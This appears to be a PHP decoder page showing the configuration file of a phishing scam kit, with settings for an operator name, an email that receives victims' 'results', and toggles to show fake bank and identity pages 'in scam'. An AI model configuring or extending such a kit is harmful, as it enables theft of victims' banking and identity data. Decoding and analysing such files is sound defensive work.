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PHP Decode

<?php error_reporting(E_ERROR | E_PARSE); //Put your name. $sp_name = "Xprofessor"; ..

Decoded Output download

	error_reporting(E_ERROR | E_PARSE); 
	//Put your name. 
	$sp_name = "Xprofessor"; 
	//Put your email to receive the result. 
	$send_email = "[email protected]"; 
	//For use the old login put 'old', for the new login put 'new'. 
	$login_theme = "new"; 
	//If you want to show Secure Page in scam put true, otherwise put false. 
	$secure_page = false; 
	//If you want to show Bank Page in scam put true, otherwise put false. 
	$bank_page = true; 
	//If you want to show Identity Page in scam put true, otherwise put false. 
	$identity_page = true; 
	//Please change the name of result file, For protect your result. 
	$savefile_name = "result.html"; 
	//If you want to save result in HTML put true, otherwise put false. 
	$save_result = true; 
	# __   __ _    ____ ____   ____ ___  __  __   
	# \ \ / // \  / ___/ ___| / ___/ _ \|  \/  |  
	#  \ V // _ \ \___ \___ \| |  | | | | |\/| |  
	#   | |/ ___ \ ___) |__) | |__| |_| | |  | |  
	#   |_/_/   \_\____/____/ \____\___/|_|  |_|  

Did this file decode correctly?

Original Code

	error_reporting(E_ERROR | E_PARSE);
	//Put your name.
	$sp_name = "Xprofessor";

	//Put your email to receive the result.
	$send_email = "[email protected]";

	//For use the old login put 'old', for the new login put 'new'.
	$login_theme = "new";

	//If you want to show Secure Page in scam put true, otherwise put false.
	$secure_page = false;

	//If you want to show Bank Page in scam put true, otherwise put false.
	$bank_page = true;

	//If you want to show Identity Page in scam put true, otherwise put false.
	$identity_page = true;

	//Please change the name of result file, For protect your result.
	$savefile_name = "result.html";

	//If you want to save result in HTML put true, otherwise put false.
	$save_result = true;
	# __   __ _    ____ ____   ____ ___  __  __  
	# \ \ / // \  / ___/ ___| / ___/ _ \|  \/  | 
	#  \ V // _ \ \___ \___ \| |  | | | | |\/| | 
	#   | |/ ___ \ ___) |__) | |__| |_| | |  | | 
	#   |_/_/   \_\____/____/ \____\___/|_|  |_| 

Function Calls





MD5 48110e34cc27809ef78fc296b31a813c
Eval Count 0
Decode Time 101 ms